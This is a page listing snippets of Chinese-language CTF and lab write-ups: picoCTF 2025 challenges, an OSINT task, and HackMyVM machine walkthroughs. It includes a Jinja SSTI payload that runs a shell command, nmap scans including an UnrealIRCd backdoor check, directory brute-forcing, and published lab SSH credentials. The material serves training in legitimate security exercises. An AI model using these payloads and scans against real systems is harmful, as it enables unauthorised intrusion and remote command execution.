picoCTF All General Skills Challenge Writeup
picoCTF 2025
FANTASY CTF
EASY
題目給了一個 netcat 連線資訊 連進去之後一直按 Enter 會出現第一個選單
Options:
A) *Register multiple accounts*
- picoCTF Web Challenge Writeup picoCTF 2025 SSTI1 EASY 有一個輸入框 什麼都沒有檔 直接 SSTI 就好 payload : {{lipsum.__globals__.os.popen('cat flag').read()}}
Fearnot changed 12 days agoView mode
- OSINT-003 題目給了這張圖片,直接用Google Lens搜尋就可以找到答案了  flag ||hmv{GataCattana}|| OSINT-006
- 話說這個flag長得特別屌 開始挑戰 用 ssh 連線 ssh -p 5000 hacker@venus.hackmyvm.eu Host: venus.hackmyvm.eu Port: 5000 User: hacker Pass: havefun!
- Step.1 掃描 先用 nmap 掃描一下 nmap -T4 192.168.111.89 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5902/tcp filtered vnc-2 看到 robots.txt 有個路徑
- Step.1 掃描 nmap -T4 192.168.223.107 若遇到以下情形可以試著「降速」T5 --> T4 Warning: 192.168.223.107 giving up on port because retransmission cap hit (2). 掃描後發現有以下的服務 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh
- Step.1 掃描 一樣先namp掃描 nmap -sV -T5 192.168.195.120 找到一個開啟的 port 6667 執行的服務是irc版本為UnrealIRCd 6667/tcp open irc UnrealIRCd 接著根據這個版本掃描對應漏洞 nmap --script "irc-unrealircd-backdoor" -p 6667 192.168.195.120
- Step.1 掃描 第一步都先nmap一下 nmap -T5 192.168.144.111  可以發現到80port是網頁服務,用firefox打開看一下  Step.2 爆破 沒什麼特別的,用dirsearch爆破一下
